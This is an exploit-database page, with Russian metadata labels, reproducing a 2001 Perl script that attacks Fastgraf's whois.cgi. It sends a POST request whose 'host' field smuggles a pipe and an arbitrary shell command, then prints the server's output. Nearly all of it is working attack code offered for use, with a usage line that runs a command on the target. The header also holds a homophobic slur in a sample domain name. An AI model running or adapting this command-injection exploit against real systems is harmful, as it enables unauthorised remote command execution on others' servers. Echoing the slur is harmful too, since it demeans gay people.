- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 242
- Проверка EDB
-
- Пройдено
- Автор
- MARCO VAN BERKUM
- Тип уязвимости
- WEBAPPS
- Платформа
- CGI
- CVE
- null
- Дата публикации
- 2001-01-12
Код:
#!/usr/bin/perl
###############################################################
# whois.pl - Marco van Berkum - [email protected] #
# homepage: http://ws.obit.nl - exploits Fastgraf's whois.cgi #
# #
# DO NOT EDIT THIS HEADER, else the bedbugs will bite #
# Greets to sigmo for finding stupid POST examples #
# Also greetings to DUCKEL (YES YOU HAVE CREDIT NOW ;)) #
# #
# Use like this: #
# ./whois.pl www.ifyoureadthisyouaregay.com "ls -al" #
###############################################################
use IO::Socket;
$host = $ARGV[0]; $command = $ARGV[1]; $length = length($command) + 8;
$sock = new IO::Socket::INET (PeerAddr => $host, PeerPort => 80, Proto => 'tcp');
if($sock) {
print $sock "POST http://$host/cgi-bin/whois.cgi HTTP/1.0
User-Agent: Whois Meta Character Exploit Browser :P
Host: $host
Content-length: $length
host=%7c$command\n\n";
sleep(3); # change to lower or higher, depending on your connection
sysread($sock, $buffer, 100000);
($empty, $output) = split(/PRE/, $buffer);
$output =~ s/[\<\>\/]//g;
if($output) {
print("$output\n");
} else { print "No data, or not vulnerable\n";
}
}
close $sock;
# milw0rm.com [2001-01-12]- Источник
- www.exploit-db.com
